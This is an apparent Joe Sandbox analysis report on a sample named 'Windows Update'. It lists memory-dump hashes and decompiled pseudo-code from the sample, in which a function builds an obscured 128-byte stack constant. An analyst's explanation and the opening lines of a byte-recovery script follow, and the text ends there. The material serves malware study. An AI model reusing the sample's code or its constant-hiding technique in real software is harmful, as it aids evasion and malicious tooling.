                                                                                  • Instruction Fuzzy Hash: 5911E435248384DFE319CB14C880B56B792EB88708F24C5ADE9490B783C73BD803DA41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110911927.0000000000622000.00000040.00000040.sdmp, Offset: 00622000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_622000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 25e4fd7361760ea476f5459a0f6280bea6510325a653750bccc5babd172b74c1
                                                                                  • Instruction ID: 6c239f80719e91eb5d72e0cea6bbbbeeed2a2dfe83a816d7eff7ae29bc34a58b
                                                                                  • Opcode Fuzzy Hash: 25e4fd7361760ea476f5459a0f6280bea6510325a653750bccc5babd172b74c1
                                                                                  • Instruction Fuzzy Hash: 4B11D631244B94DFD715CB14E584B25BB92EB85708F28C5ADE8490B742C73FD903CE61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110887492.0000000000600000.00000040.00000040.sdmp, Offset: 00600000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_600000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 737154f2f48d4167351ac4373f64e4788b22ca309bd0bfcc742c62f7069a5e2e
                                                                                  • Instruction ID: 0996bfd798f149fca64fec3c46930ced84c232ebbc01da1a6178a53516e8c296
                                                                                  • Opcode Fuzzy Hash: 737154f2f48d4167351ac4373f64e4788b22ca309bd0bfcc742c62f7069a5e2e
                                                                                  • Instruction Fuzzy Hash: 8C215C3524D3C49FD716CB60C890B51BFB2AF5B704F1886DED4898B6A3C73A8806DB52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2113092891.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_43f0000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f4d4f46000a436ba1987421ec496b03b1bb87faae0b4d7154fb761634d3e8a28
                                                                                  • Instruction ID: de0c6a2ecafef38ca4e669b4bb4f73592aa561384d8f0fc19d127f5e47230ee9
                                                                                  • Opcode Fuzzy Hash: f4d4f46000a436ba1987421ec496b03b1bb87faae0b4d7154fb761634d3e8a28
                                                                                  • Instruction Fuzzy Hash: 4D11BAB5508301AFD350CF49DC85E5BFBE8EB88660F04892EFD9997311D271E9088FA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110422187.00000000001A2000.00000040.00000001.sdmp, Offset: 001A2000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_1a2000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5d8c871b11e188385600cf445bb76538c396f2de27b473fa07f86b927cdaa2ff
                                                                                  • Instruction ID: 93f83b993b38c6dbc284b83af1e86b87949d37ba92f2f8a5bd29fcc4373ce22b
                                                                                  • Opcode Fuzzy Hash: 5d8c871b11e188385600cf445bb76538c396f2de27b473fa07f86b927cdaa2ff
                                                                                  • Instruction Fuzzy Hash: 5E11BAB5508301AFD350CF49DC41E5BFBE9EB88660F04892EFD9997311D271E9048FA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110911927.0000000000622000.00000040.00000040.sdmp, Offset: 00622000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_622000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7814d606b2fd3036dcd205b2c7e84d4431138482a9a625aafe7c131a7ca8038a
                                                                                  • Instruction ID: dea240a82056be498c5e405f954685fe84c35e325f469be778b2109fa7fc336c
                                                                                  • Opcode Fuzzy Hash: 7814d606b2fd3036dcd205b2c7e84d4431138482a9a625aafe7c131a7ca8038a
                                                                                  • Instruction Fuzzy Hash: 401179302086C08FD712CB20D850B51BFB2AF56714F1886EED8884B6A3C73A8806DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110887492.0000000000600000.00000040.00000040.sdmp, Offset: 00600000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_600000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 852cce166d25ecb805afd99f9c437f380c983e3a1d0e77a61b8f8a202004cb10
                                                                                  • Instruction ID: 73b67854d5d2dd5c5f9f3f4c6a56b8a5ab2f2437446f7ac98599c3792c6da5b4
                                                                                  • Opcode Fuzzy Hash: 852cce166d25ecb805afd99f9c437f380c983e3a1d0e77a61b8f8a202004cb10
                                                                                  • Instruction Fuzzy Hash: 8401D6B65093806FD7018B06AC44863FFF8EF87630748C19FEC898B652D226A905CB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110887492.0000000000600000.00000040.00000040.sdmp, Offset: 00600000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_600000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e97997a94c4c79ed3d81e1b5408e06104f0e3360e17351575fbe2cd674f02ae7
                                                                                  • Instruction ID: bf511f599da92507b1a2d94832f9ebcdd4997f61ca709f62d124673b16064da2
                                                                                  • Opcode Fuzzy Hash: e97997a94c4c79ed3d81e1b5408e06104f0e3360e17351575fbe2cd674f02ae7
                                                                                  • Instruction Fuzzy Hash: 49F03C35248644DFD306CF14D940B56FBA2FB89718F24C6ADE9491B762C737E813DA81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110911927.0000000000622000.00000040.00000040.sdmp, Offset: 00622000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_622000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8f10923213c14f3d098aabe34cfdbf77621fbd2db08793df75a2ea6ce7e91e70
                                                                                  • Instruction ID: 71a32a7dc6f0dbe6f801aec4d4e089c0d7588f09a712ba759749ac778a96bfb2
                                                                                  • Opcode Fuzzy Hash: 8f10923213c14f3d098aabe34cfdbf77621fbd2db08793df75a2ea6ce7e91e70
                                                                                  • Instruction Fuzzy Hash: 3BF03C35248A84DFC316CF14E940B25FBA2FB89718F24C6ADE9480B752C73B9913DE91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110887492.0000000000600000.00000040.00000040.sdmp, Offset: 00600000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_600000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 09b6a177b44a95f1ba74bf6d6e02304bd4ac871766bd6f8bef600c7cd40f5919
                                                                                  • Instruction ID: 153d14e3f4b50d7cf3218eb8175eaf9ad562c8b78bf29b644025a2b35f8330da
                                                                                  • Opcode Fuzzy Hash: 09b6a177b44a95f1ba74bf6d6e02304bd4ac871766bd6f8bef600c7cd40f5919
                                                                                  • Instruction Fuzzy Hash: 8FE092766017008BD750CF0AEC41852F794EB84A30B48C47FDC0D8B710D236B504CAA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2113092891.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_43f0000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 772700fd40e65d8c35c24a4f166697761baea93b5179249611458639f30ce212
                                                                                  • Instruction ID: ed8c5f981fd13fab8e15cf5937c97eaba201951683ca2ea267151f63066d120c
                                                                                  • Opcode Fuzzy Hash: 772700fd40e65d8c35c24a4f166697761baea93b5179249611458639f30ce212
                                                                                  • Instruction Fuzzy Hash: 4EE0207250030067D2108F069C46F53FB98DB40A70F04C467ED0C1F302E172B51489F5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2113092891.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_43f0000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: df3d9afc87d3a7312583272eb2c3288fc025d9ca79f804545cc38e63c04e57af
                                                                                  • Instruction ID: 0eb31ed8abffedd3f681285205bbc07ffb7c3e3ac900d2b1982edf6dc5e33ea4
                                                                                  • Opcode Fuzzy Hash: df3d9afc87d3a7312583272eb2c3288fc025d9ca79f804545cc38e63c04e57af
                                                                                  • Instruction Fuzzy Hash: AAE0207250030467D2109F069C4AF53FB98DB40A70F04C567ED0D1F312E173B50489F5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2113092891.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_43f0000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1a9be190e88ab30ee6463b137feaced439edcc0fb1159568fa26d520ff982356
                                                                                  • Instruction ID: 551325b9def231e56785d9435ab41338521b35517bf1ef268581bf125c00e392
                                                                                  • Opcode Fuzzy Hash: 1a9be190e88ab30ee6463b137feaced439edcc0fb1159568fa26d520ff982356
                                                                                  • Instruction Fuzzy Hash: C2E0D87250030067D2109F069C46F53FB98DB50A70F44C467ED081B306E177B51489E5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2113092891.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_43f0000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 88f524d342e6e05da564f58e0309c7d55a62bdadfd93b1649961e1399fea37db
                                                                                  • Instruction ID: f73c5a646af01bb1672ebc1d697a772ab9a6694efd5873bb77531cce46250273
                                                                                  • Opcode Fuzzy Hash: 88f524d342e6e05da564f58e0309c7d55a62bdadfd93b1649961e1399fea37db
                                                                                  • Instruction Fuzzy Hash: 7CE0207254030067D2108F069C46F53FB98DB40A70F04C467ED0C1F702E172B5148BF5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110422187.00000000001A2000.00000040.00000001.sdmp, Offset: 001A2000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_1a2000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 77937a48c9625dd5a882cb9919e49c5d4524d2de1d9519a2d64f1d07cbe2868d
                                                                                  • Instruction ID: 64c79aa1c0b39f4b772a0418239045c5274d84dae0c2b43a7e1585381700f5a1
                                                                                  • Opcode Fuzzy Hash: 77937a48c9625dd5a882cb9919e49c5d4524d2de1d9519a2d64f1d07cbe2868d
                                                                                  • Instruction Fuzzy Hash: 8AE026B294030467E2108F06AC46F63FB98EB40A71F08C96BED0C1F342E1B2B9048AF5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110422187.00000000001A2000.00000040.00000001.sdmp, Offset: 001A2000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_1a2000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0ef67a4d17ca05243621f42ded792c9f7af90ee34d6eefa9d66b63c26e56d9e5
                                                                                  • Instruction ID: 5c12a018589fc9814a3020c9ecbea985c66cee1bfab2f41d179a5ca7d4351e51
                                                                                  • Opcode Fuzzy Hash: 0ef67a4d17ca05243621f42ded792c9f7af90ee34d6eefa9d66b63c26e56d9e5
                                                                                  • Instruction Fuzzy Hash: F7E0DFB294030467E2108E06AC46F63FB98EB40A70F08C86BEE081B312E172B9048AF5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110422187.00000000001A2000.00000040.00000001.sdmp, Offset: 001A2000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_1a2000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 20906cbc5e1e99aac9df2969dd1b724dabdfcf17a7f4e9690a689ceaf110d9ed
                                                                                  • Instruction ID: ccb4bf8176ec5e280b7a44c08f4d594bce1f1b6d8445c1326c6410af0f3a1609
                                                                                  • Opcode Fuzzy Hash: 20906cbc5e1e99aac9df2969dd1b724dabdfcf17a7f4e9690a689ceaf110d9ed
                                                                                  • Instruction Fuzzy Hash: 53E0207250030467D2109F069C46F53FB98EB40A70F04C467ED0C1F303E172B50489F5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110359352.0000000000112000.00000040.00000001.sdmp, Offset: 00112000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_112000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6c8d67293bd00f4d211ba116c4f78e1c040f5096de94f641b7d94020da0dbe21
                                                                                  • Instruction ID: 2a74115fb89dc8862e691bdbf8618aba6cc5f9f88dd70b174dc63196db9337eb
                                                                                  • Opcode Fuzzy Hash: 6c8d67293bd00f4d211ba116c4f78e1c040f5096de94f641b7d94020da0dbe21
                                                                                  • Instruction Fuzzy Hash: 79D05EB9304A818FD71A8A1CC1A4B9537D4AB51B04F5644F9E800CBAA3C778E9D1D200
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110359352.0000000000112000.00000040.00000001.sdmp, Offset: 00112000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_112000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 25eb779820ac1f186cf20854e193e059aabbb3dd725b9a3520c68d6f46559e5c
                                                                                  • Instruction ID: e7610a20dac7a2efab79dfa91336df78c7d817e21d77dd36470f320c6a802dd2
                                                                                  • Opcode Fuzzy Hash: 25eb779820ac1f186cf20854e193e059aabbb3dd725b9a3520c68d6f46559e5c
                                                                                  • Instruction Fuzzy Hash: 34D05E343106818FDB19CA0CC294F9973E4BB44700F0644F8FC108B266C3B8ECD0D600
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  C-Code - Quality: 75%
                                                                                  			E00EEB1E6(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                  				char* _v8;
                                                                                  				char _v12;
                                                                                  				signed char* _v16;
                                                                                  				signed char* _v20;
                                                                                  				signed char* _v24;
                                                                                  				char _v152;
                                                                                  				char _v153;
                                                                                  				char _v154;
                                                                                  				char _v155;
                                                                                  				char _v156;
                                                                                  				char _v157;
                                                                                  				char _v158;
                                                                                  				char _v159;
                                                                                  				char _v160;
                                                                                  				char _v161;
                                                                                  				char _v162;
                                                                                  				char _v163;
                                                                                  				char _v164;
                                                                                  				char _v165;
                                                                                  				char _v166;
                                                                                  				char _v167;
                                                                                  				char _v168;
                                                                                  				char _v169;
                                                                                  				char _v170;
                                                                                  				char _v171;
                                                                                  				char _v172;
                                                                                  				char _v173;
                                                                                  				char _v174;
                                                                                  				char _v175;
                                                                                  				char _v176;
                                                                                  				char _v177;
                                                                                  				char _v178;
                                                                                  				char _v179;
                                                                                  				char _v180;
                                                                                  				char _v181;
                                                                                  				char _v182;
                                                                                  				char _v183;
                                                                                  				char _v184;
                                                                                  				char _v185;
                                                                                  				char _v186;
                                                                                  				char _v187;
                                                                                  				char _v188;
                                                                                  				char _v189;
                                                                                  				char _v190;
                                                                                  				char _v191;
                                                                                  				char _v192;
                                                                                  				char _v193;
                                                                                  				char _v194;
                                                                                  				char _v195;
                                                                                  				char _v196;
                                                                                  				char _v197;
                                                                                  				char _v198;
                                                                                  				char _v199;
                                                                                  				char _v200;
                                                                                  				char _v201;
                                                                                  				char _v202;
                                                                                  				char _v203;
                                                                                  				char _v204;
                                                                                  				char _v205;
                                                                                  				char _v206;
                                                                                  				char _v207;
                                                                                  				char _v208;
                                                                                  				char _v209;
                                                                                  				char _v210;
                                                                                  				char _v211;
                                                                                  				char _v212;
                                                                                  				char _v213;
                                                                                  				char _v214;
                                                                                  				char _v215;
                                                                                  				char _v216;
                                                                                  				char _v217;
                                                                                  				char _v218;
                                                                                  				char _v219;
                                                                                  				char _v220;
                                                                                  				char _v221;
                                                                                  				char _v222;
                                                                                  				char _v223;
                                                                                  				char _v224;
                                                                                  				char _v225;
                                                                                  				char _v226;
                                                                                  				char _v227;
                                                                                  				char _v228;
                                                                                  				char _v229;
                                                                                  				char _v230;
                                                                                  				signed char* _v231;
                                                                                  				char _v232;
                                                                                  				char _v233;
                                                                                  				char _v234;
                                                                                  				char _v235;
                                                                                  				char _v236;
                                                                                  				char _v237;
                                                                                  				char _v238;
                                                                                  				char _v239;
                                                                                  				char _v240;
                                                                                  				char _v241;
                                                                                  				char _v242;
                                                                                  				char _v243;
                                                                                  				char _v244;
                                                                                  				char _v245;
                                                                                  				char _v246;
                                                                                  				char _v247;
                                                                                  				char _v248;
                                                                                  				char _v249;
                                                                                  				char _v250;
                                                                                  				char _v251;
                                                                                  				char _v252;
                                                                                  				char _v253;
                                                                                  				char _v254;
                                                                                  				char _v255;
                                                                                  				char _v256;
                                                                                  				char _v257;
                                                                                  				char _v258;
                                                                                  				char _v259;
                                                                                  				char _v260;
                                                                                  				char _v261;
                                                                                  				char _v262;
                                                                                  				char _v263;
                                                                                  				char _v264;
                                                                                  				char _v265;
                                                                                  				char _v266;
                                                                                  				char _v267;
                                                                                  				char _v268;
                                                                                  				char _v269;
                                                                                  				char _v270;
                                                                                  				char _v271;
                                                                                  				char _v272;
                                                                                  				char _v273;
                                                                                  				char _v274;
                                                                                  				char _v275;
                                                                                  				char _v276;
                                                                                  				char _v277;
                                                                                  				char _v278;
                                                                                  				char _v279;
                                                                                  				char _v280;
                                                                                  				signed char* _v284;
                                                                                  				char _v288;
                                                                                  				intOrPtr _v292;
                                                                                  				intOrPtr _v296;
                                                                                  				signed int _v300;
                                                                                  				char _v320;
                                                                                  				void _v348;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* _t178;
                                                                                  				void* _t180;
                                                                                  				void* _t182;
                                                                                  				signed char* _t184;
                                                                                  				intOrPtr _t219;
                                                                                  				signed int _t231;
                                                                                  				intOrPtr _t242;
                                                                                  
                                                                                  				_t242 = __ecx;
                                                                                  				_push(0x44356c);
                                                                                  				_v292 = __ecx;
                                                                                  				_a4 = _a4 + 4;
                                                                                  				_t178 = E00EF105D(_a4 + 4);
                                                                                  				_push(_t178);
                                                                                  				L00F2B581();
                                                                                  				_t219 = _a8;
                                                                                  				if(_t178 == 0) {
                                                                                  					E00EF1069(E00EF105D(_t219 + 4) | 0xffffffff, __ecx + 0x2c, _t216);
                                                                                  				}
                                                                                  				_push(0x44357c);
                                                                                  				_t180 = E00EF105D(_a4);
                                                                                  				_push(_t180);
                                                                                  				L00F2B581();
                                                                                  				if(_t180 == 0) {
                                                                                  					E00EF1069(E00EF105D(_t219 + 4) | 0xffffffff, _t242 + 0x40, _t212);
                                                                                  				}
                                                                                  				_push(0x443588);
                                                                                  				_t182 = E00EF105D(_a4);
                                                                                  				_push(_t182);
                                                                                  				L00F2B581();
                                                                                  				if(_t182 == 0) {
                                                                                  					E00EF1069(E00EF105D(_t219 + 4) | 0xffffffff, _t242 + 0x54, _t208);
                                                                                  				}
                                                                                  				_push(0x443598);
                                                                                  				_t184 = E00EF105D(_a4);
                                                                                  				_push(_t184);
                                                                                  				L00F2B581();
                                                                                  				if(_t184 != 0) {
                                                                                  					L13:
                                                                                  					return _t184;
                                                                                  				} else {
                                                                                  					_v24 = _t184;
                                                                                  					_v16 = _t184;
                                                                                  					_v20 = _t184;
                                                                                  					_v280 = 0x1d;
                                                                                  					_v279 = 0xac;
                                                                                  					_v278 = 0xa8;
                                                                                  					_v277 = 0xf8;
                                                                                  					_v276 = 0xd3;
                                                                                  					_v275 = 0xb8;
                                                                                  					_v274 = 0x48;
                                                                                  					_v273 = 0x3e;
                                                                                  					_v272 = 0x48;
                                                                                  					_v271 = 0x7d;
                                                                                  					_v270 = 0x3e;
                                                                                  					_v269 = 0xa;
                                                                                  					_v268 = 0x62;
                                                                                  					_v267 = 7;
                                                                                  					_v266 = 0xdd;
                                                                                  					_v265 = 0x26;
                                                                                  					_v264 = 0xe6;
                                                                                  					_v263 = 0x67;
                                                                                  					_v262 = 0x81;
                                                                                  					_v261 = 3;
                                                                                  					_v260 = 0xe7;
                                                                                  					_v259 = 0xb2;
                                                                                  					_v258 = 0x13;
                                                                                  					_v257 = 0xa5;
                                                                                  					_v256 = 0xb0;
                                                                                  					_v255 = 0x79;
                                                                                  					_v254 = 0xee;
                                                                                  					_v253 = 0x4f;
                                                                                  					_v252 = 0xf;
                                                                                  					_v251 = 0x41;
                                                                                  					_v250 = 0x15;
                                                                                  					_v249 = 0xed;
                                                                                  					_v248 = 0x7b;
                                                                                  					_v247 = 0x14;
                                                                                  					_v246 = 0x8c;
                                                                                  					_v245 = 0xe5;
                                                                                  					_v244 = 0x4b;
                                                                                  					_v243 = 0x46;
                                                                                  					_v242 = 0xd;
                                                                                  					_v241 = 0xc1;
                                                                                  					_v240 = 0x8e;
                                                                                  					_v239 = 0xfe;
                                                                                  					_v238 = 0xd6;
                                                                                  					_v237 = 0xe7;
                                                                                  					_v236 = 0x27;
                                                                                  					_v235 = 0x75;
                                                                                  					_v234 = 6;
                                                                                  					_v233 = 0x8b;
                                                                                  					_v232 = 0x49;
                                                                                  					_v231 = _t184;
                                                                                  					_v230 = 0xdc;
                                                                                  					_v229 = 0xf;
                                                                                  					_v228 = 0x30;
                                                                                  					_v227 = 0xa0;
                                                                                  					_v226 = 0x9e;
                                                                                  					_v225 = 0xfd;
                                                                                  					_v224 = 9;
                                                                                  					_v223 = 0x85;
                                                                                  					_v222 = 0xf1;
                                                                                  					_v221 = 0xc8;
                                                                                  					_v220 = 0xaa;
                                                                                  					_v219 = 0x75;
                                                                                  					_v218 = 0xc1;
                                                                                  					_v217 = 8;
                                                                                  					_v216 = 5;
                                                                                  					_v215 = 0x79;
                                                                                  					_v214 = 1;
                                                                                  					_v213 = 0xe2;
                                                                                  					_v212 = 0x97;
                                                                                  					_v211 = 0xd8;
                                                                                  					_v210 = 0xaf;
                                                                                  					_v209 = 0x80;
                                                                                  					_v208 = 0x38;
                                                                                  					_v207 = 0x60;
                                                                                  					_v206 = 0xb;
                                                                                  					_v205 = 0x71;
                                                                                  					_v204 = 0xe;
                                                                                  					_v203 = 0x68;
                                                                                  					_push(0x80);
                                                                                  					_push(_t184);
                                                                                  					_push( &_v152);
                                                                                  					_v202 = 0x53;
                                                                                  					_v201 = 0x77;
                                                                                  					_v200 = 0x2f;
                                                                                  					_v199 = 0xf;
                                                                                  					_v198 = 0x61;
                                                                                  					_v197 = 0xf6;
                                                                                  					_v196 = 0x1d;
                                                                                  					_v195 = 0x8e;
                                                                                  					_v194 = 0x8f;
                                                                                  					_v193 = 0x5c;
                                                                                  					_v192 = 0xb2;
                                                                                  					_v191 = 0x3d;
                                                                                  					_v190 = 0x21;
                                                                                  					_v189 = 0x74;
                                                                                  					_v188 = 0x40;
                                                                                  					_v187 = 0x4b;
                                                                                  					_v186 = 0xb5;
                                                                                  					_v185 = 6;
                                                                                  					_v184 = 0x6e;
                                                                                  					_v183 = 0xab;
                                                                                  					_v182 = 0x7a;
                                                                                  					_v181 = 0xbd;
                                                                                  					_v180 = 0x8b;
                                                                                  					_v179 = 0xa9;
                                                                                  					_v178 = 0x7e;
                                                                                  					_v177 = 0x32;
                                                                                  					_v176 = 0x8f;
                                                                                  					_v175 = 0x6e;
                                                                                  					_v174 = 6;
                                                                                  					_v173 = 0x24;
                                                                                  					_v172 = 0xd9;
                                                                                  					_v171 = 0x29;
                                                                                  					_v170 = 0xa4;
                                                                                  					_v169 = 0xa5;
                                                                                  					_v168 = 0xbe;
                                                                                  					_v167 = 0x26;
                                                                                  					_v166 = 0x23;
                                                                                  					_v165 = 0xfd;
                                                                                  					_v164 = 0xee;
                                                                                  					_v163 = 0xf1;
                                                                                  					_v162 = 0x4c;
                                                                                  					_v161 = 0xf;
                                                                                  					_v160 = 0x74;
                                                                                  					_v159 = 0x5e;
                                                                                  					_v158 = 0x58;
                                                                                  					_v157 = 0xfb;
                                                                                  					_v156 = 0x91;
                                                                                  					_v155 = 0x74;
                                                                                  					_v154 = 0xef;
                                                                                  					_v153 = 0x91;
                                                                                  					L00F2B531();
                                                                                  					asm("movsd");
                                                                                  					asm("movsd");
                                                                                  					asm("movsd");
                                                                                  					asm("movsd");
                                                                                  					_t231 = 7;
                                                                                  					_push(0x11);
                                                                                  					asm("movsb");
                                                                                  					_push( &_v320);
                                                                                  					_push( &_v152);
                                                                                  					memcpy( &_v348, 0x4435b8, _t231 << 2);
                                                                                  					L00F2B575();
                                                                                  					_v8 =  &_v280;
                                                                                  					_v296 =  *((intOrPtr*)(_t219 + 0x18));
                                                                                  					_v12 = 0x90;
                                                                                  					_v300 =  *(_t219 + 2) & 0x0000ffff;
                                                                                  					if(E00EEC860( &_v24,  &_v300,  &_v12, 0,  &_v288) != 0) {
                                                                                  						L9:
                                                                                  						_t184 = _v284;
                                                                                  						if(_t184 != 0) {
                                                                                  							E00EF118A(_v292 + 0x68,  &(_t184[4]),  *_t184 & 0x000000ff, 0);
                                                                                  							_t184 =  *0x4430d8(_v284);
                                                                                  						}
                                                                                  						L11:
                                                                                  						if(_v24 == 0) {
                                                                                  							goto L13;
                                                                                  						}
                                                                                  						return  *0x443100(_v24);
                                                                                  					}
                                                                                  					_push(0x1c);
                                                                                  					_push( &_v348);
                                                                                  					_push( &_v152);
                                                                                  					L00F2B575();
                                                                                  					_v8 =  &_v280;
                                                                                  					_v12 = 0x9b;
                                                                                  					_t184 = E00EEC860( &_v24,  &_v300,  &_v12, 0,  &_v288);
                                                                                  					if(_t184 == 0) {
                                                                                  						goto L11;
                                                                                  					}
                                                                                  					goto L9;
                                                                                  				}
                                                                                  			}
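The function above assembles a 128-byte constant on the stack one byte at a time (_v280 down to _v153) and then passes its address (&_v280, via _v8) to E00EEC860 with a length of 0x90 on the first attempt and 0x9b on the second. The report does not say what E00EEC860 does, and the script below does not guess; it only does the first thing an analyst needs, which is to turn those assignments back into bytes so the constant can be searched for, hashed or compared across samples. Two things visible in the listing matter for that: the constant itself is only 0x80 bytes, so the 16 or 27 bytes that make up the rest of the 0x90/0x9b input come from the adjacent _v152 buffer (zeroed with 0x80 bytes, then filled from _v320 or from the data at 0x4435b8), and the slot _v231 is written from the register temporary _t184 rather than an immediate. This Python script is an added example, not Joe Sandbox output and not code from the sample. Its input is the assignment statements copied from the listing above and reflowed eight per line. It assumes every _vNNN slot in that run is one byte wide (the decompiler types _v231 as a pointer, but it sits inside the byte run and is followed immediately by _v230) and that _t184 holds zero at that point, which follows from the `if(_t184 != 0)` guard the assignments are under.

```python
"""Rebuild a constant that decompiled code assembles on the stack one byte at a time."""
import math
import re

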